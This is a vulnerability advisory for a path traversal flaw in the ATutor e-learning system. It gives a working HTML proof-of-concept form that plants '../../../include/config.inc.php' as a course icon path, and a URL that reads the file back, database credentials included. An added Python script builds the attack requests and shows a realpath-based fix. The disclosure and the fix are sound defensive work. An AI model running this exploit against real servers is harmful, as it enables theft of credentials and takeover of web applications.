High-Tech Bridge Security Research Lab discovered a path traversal vulnerability in ATutor, a popular web-based e-learning system. A remote attacker can read the contents of arbitrary local files on the target system with the privileges of the web server.
The vulnerability may allow an attacker to gain access to potentially sensitive web application and system information (for example the database credentials in the configuration file) and to use the obtained data to gain complete control over the vulnerable web application.
Successful exploitation requires that the attacker is a registered and authenticated user, but registration is open by default.
The vulnerability exists due to the absence of filtration of user-supplied data passed via the "icon" HTTP POST parameter to the "/mods/_core/courses/users/create_course.php" script when the course information is saved to the database. A remote authenticated attacker can use directory traversal sequences (e.g. "../") in the icon parameter to overwrite its stored value, and then have the application include an arbitrary file from the system and return its contents.
The following PoC code can be used to replace the path to the course icon in the database. In this example, we inject the path to the system configuration file "/include/config.inc.php" (three levels up from the directory the icon is read from):
<form action="http://[host]/mods/_core/courses/users/create_course.php" method="POST" name="f1" enctype="multipart/form-data">
<input type="hidden" name="form_course" value="true">
<input type="hidden" name="MAX_FILE_SIZE" value="819200">
<input type="hidden" name="course" value="0">
<input type="hidden" name="old_access" value="protected">
<input type="hidden" name="created_date" value="2016-02-17 13:20:26">
<input type="hidden" name="show_courses" value="0">
<input type="hidden" name="current_cat" value="0">
<input type="hidden" name="title" value="vulnerable">
<input type="hidden" name="pri_lang" value="en">
<input type="hidden" name="description" value="">
<input type="hidden" name="category_parent" value="0">
<input type="hidden" name="content_packaging" value="top">
<input type="hidden" name="rss" value="0">
<input type="hidden" name="access" value="protected">
<input type="hidden" name="release_date" value="0">
<input type="hidden" name="day_release" value="0">
<input type="hidden" name="month_release" value="0">
<input type="hidden" name="year_release" value="0">
<input type="hidden" name="hour_release" value="0">
<input type="hidden" name="min_release" value="0">
<input type="hidden" name="end_date" value="0">
<input type="hidden" name="day_end" value="0">
<input type="hidden" name="month_end" value="0">
<input type="hidden" name="year_end" value="2016">
<input type="hidden" name="hour_end" value="0">
<input type="hidden" name="min_end" value="0">
<input type="hidden" name="banner" value="">
<input type="hidden" name="initial_content" value="1">
<input type="hidden" name="quota" value="-2">
<input type="hidden" name="filesize" value="-3">
<input type="hidden" name="tracking" value="">
<input type="hidden" name="copyright" value="">
<input type="hidden" name="boolForce" value="">
<input type="hidden" name="MAX_FILE_SIZE" value="">
<input type="hidden" name="customicon" value="">
<input type="hidden" name="custOptCount" value="0">
<input type="hidden" name="courseId" value="[COURSE_ID]">
<!-- the traversal payload: stored unfiltered as the course icon path -->
<input type="hidden" name="icon" value="../../../include/config.inc.php">
<!-- type="submit" so the form actually posts; the page must be loaded in a browser holding an authenticated ATutor session -->
<input type="submit" name="submit" value="Save">
</form>
The injected value is later passed unchanged to the "readfile()" function in the "/get_course_icon.php" script. To view the contents of the "/include/config.inc.php" file, including the database credentials, the attacker then opens the following URL (readfile() returns the raw bytes of the file, so inspect the response body with a proxy or curl rather than relying on the browser to render it as an image):
http://[host]/get_course_icon.php?id=[COURSE_ID]
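A scripted version of the two-step procedure described above (the multipart POST that plants the traversal string as the course icon, then the GET that makes get_course_icon.php read the file back), together with the canonicalise-and-confine check that the icon lookup should have applied before readfile(). This is an added example and is not code from the High-Tech Bridge advisory or from ATutor itself; the host name, the session cookie (assumed here to be named ATutorID), the course id and the directory layout of the constructed demo tree (an icon directory three levels below the web root, so that the advisory's payload resolves to include/config.inc.php) are all assumptions. The hidden field list is copied from the PoC form.

```python
# Added example, not code from the High-Tech Bridge advisory or from ATutor.
# Part 1 builds the two HTTP requests the advisory describes with the standard
# library only. Part 2 models the server side in Python: the unchecked
# readfile()-style lookup beside a canonicalise-and-confine check that rejects
# the payload. Host, cookie name, course id and demo tree layout are assumptions.
import os
import tempfile
import urllib.request

# Value planted in the "icon" field by the advisory's PoC form.
TRAVERSAL_ICON = "../../../include/config.inc.php"


def build_course_form(course_id, icon):
    """Hidden fields of the PoC form, in order (MAX_FILE_SIZE is sent twice there)."""
    return [
        ("form_course", "true"), ("MAX_FILE_SIZE", "819200"), ("course", "0"),
        ("old_access", "protected"), ("created_date", "2016-02-17 13:20:26"),
        ("show_courses", "0"), ("current_cat", "0"), ("title", "vulnerable"),
        ("pri_lang", "en"), ("description", ""), ("category_parent", "0"),
        ("content_packaging", "top"), ("rss", "0"), ("access", "protected"),
        ("release_date", "0"), ("day_release", "0"), ("month_release", "0"),
        ("year_release", "0"), ("hour_release", "0"), ("min_release", "0"),
        ("end_date", "0"), ("day_end", "0"), ("month_end", "0"), ("year_end", "2016"),
        ("hour_end", "0"), ("min_end", "0"), ("banner", ""), ("initial_content", "1"),
        ("quota", "-2"), ("filesize", "-3"), ("tracking", ""), ("copyright", ""),
        ("boolForce", ""), ("MAX_FILE_SIZE", ""), ("customicon", ""),
        ("custOptCount", "0"), ("courseId", course_id), ("icon", icon),
        ("submit", "Save"),
    ]


def encode_multipart(fields, boundary="htbPoCboundary"):
    """Serialise (name, value) pairs as multipart/form-data, as a browser would."""
    parts = []
    for name, value in fields:
        parts.append("--" + boundary)
        parts.append('Content-Disposition: form-data; name="%s"' % name)
        parts.append("")
        parts.append(value)
    parts.append("--" + boundary + "--")
    parts.append("")
    body = "\r\n".join(parts).encode("utf-8")
    return body, "multipart/form-data; boundary=" + boundary


def build_requests(host, course_id, session_cookie):
    """The POST that plants the icon path and the GET that reads the file back."""
    body, content_type = encode_multipart(build_course_form(course_id, TRAVERSAL_ICON))
    post = urllib.request.Request(
        "http://%s/mods/_core/courses/users/create_course.php" % host,
        data=body, headers={"Content-Type": content_type, "Cookie": session_cookie},
        method="POST")
    get = urllib.request.Request(
        "http://%s/get_course_icon.php?id=%s" % (host, course_id),
        headers={"Cookie": session_cookie})
    return post, get


# ---- server side, modelled in Python ---------------------------------------

def vulnerable_read_icon(icon_dir, icon):
    """Mirrors the unchecked lookup: whatever was stored is joined and read as-is."""
    with open(os.path.join(icon_dir, icon), "rb") as f:
        return f.read()


def safe_icon_path(icon_dir, icon):
    """Canonicalise the joined path and refuse anything outside icon_dir."""
    base = os.path.realpath(icon_dir)
    target = os.path.realpath(os.path.join(base, icon))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("icon path escapes the icon directory: %r" % icon)
    if not os.path.isfile(target):
        raise FileNotFoundError(target)
    return target


def hardened_read_icon(icon_dir, icon):
    with open(safe_icon_path(icon_dir, icon), "rb") as f:
        return f.read()


def make_demo_tree():
    """Constructed layout: <root>/include/config.inc.php and an icon dir 3 levels deep."""
    root = tempfile.mkdtemp(prefix="atutor-demo-")
    icon_dir = os.path.join(root, "images", "courses", "icons")
    os.makedirs(icon_dir)
    os.makedirs(os.path.join(root, "include"))
    with open(os.path.join(root, "include", "config.inc.php"), "w") as f:
        f.write("<?php $db_password = 'constructed-secret'; ?>\n")
    with open(os.path.join(icon_dir, "course.png"), "wb") as f:
        f.write(b"\x89PNG constructed icon")
    return root, icon_dir


if __name__ == "__main__":
    root, icon_dir = make_demo_tree()
    print(vulnerable_read_icon(icon_dir, TRAVERSAL_ICON))   # config file leaks
    print(hardened_read_icon(icon_dir, "course.png")[:4])   # real icon still served
    try:
        hardened_read_icon(icon_dir, TRAVERSAL_ICON)
    except ValueError as e:
        print("blocked:", e)
    post, get = build_requests("atutor.example", "1", "ATutorID=<session>")
    print(post.full_url, get.full_url)
```

Only the request objects are built here; sending them with urllib.request.urlopen() against a live instance needs a valid session cookie, which is why the cookie is a parameter. The hardened lookup resolves symlinks and ".." with realpath() before comparing against the icon directory, which is the same shape a PHP fix would take with realpath() and a prefix check; storing only a validated file name (no separators) instead of a path removes the problem at the create_course.php side as well.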